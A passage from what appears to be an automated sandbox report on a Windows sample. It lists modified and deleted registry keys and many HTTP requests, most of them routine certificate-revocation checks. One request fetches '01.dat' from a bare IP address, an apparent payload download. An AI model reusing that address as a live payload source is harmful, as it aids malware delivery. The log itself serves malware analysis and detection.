- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingTime",
- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadTimeRemainingMs",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadProgressPercent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\StateValue",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Performance\\PerfMMFileName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\uid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\old-uid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\tttoken",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableCount",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableSince",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\tttoken"
- ]
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://185.140.248.17/01.dat",
- "user-agent": "",
- "method": "GET",
- "host": "185.140.248.17",
- "version": "1.1",
- "path": "/01.dat",
- "data": "GET /01.dat HTTP/1.1\r\nHost: 185.140.248.17\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nCache-Control: max-age = 89056\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 18:30:24 GMT\r\nIf-None-Match: \"5c9529c0-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
- "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Feb 2019 02:02:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.comodoca.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D HTTP/1.1\r\nCache-Control: max-age = 94804\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1\r\nCache-Control: max-age = 108232\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 23:50:01 GMT\r\nIf-None-Match: \"5c9574a9-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
- "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP/1.1\r\nCache-Control: max-age = 93156\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 04:40:45 GMT\r\nIf-None-Match: \"5c8c7e4d-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1\r\nCache-Control: max-age = 149079\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:10:47 GMT\r\nIf-None-Match: \"5c961437-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D HTTP/1.1\r\nCache-Control: max-age = 148251\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 18:10:24 GMT\r\nIf-None-Match: \"5c8d3c10-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1\r\nCache-Control: max-age = 126990\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 10:41:16 GMT\r\nIf-None-Match: \"5c960d4c-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.msocsp.com",
- "version": "1.1",
- "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
- "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.thawte.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D HTTP/1.1\r\nCache-Control: max-age = 320712\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Wed, 20 Mar 2019 11:42:01 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.thawte.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.usertrust.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "th.symcd.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D HTTP/1.1\r\nCache-Control: max-age = 386377\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 21 Mar 2019 05:58:32 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: th.symcd.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
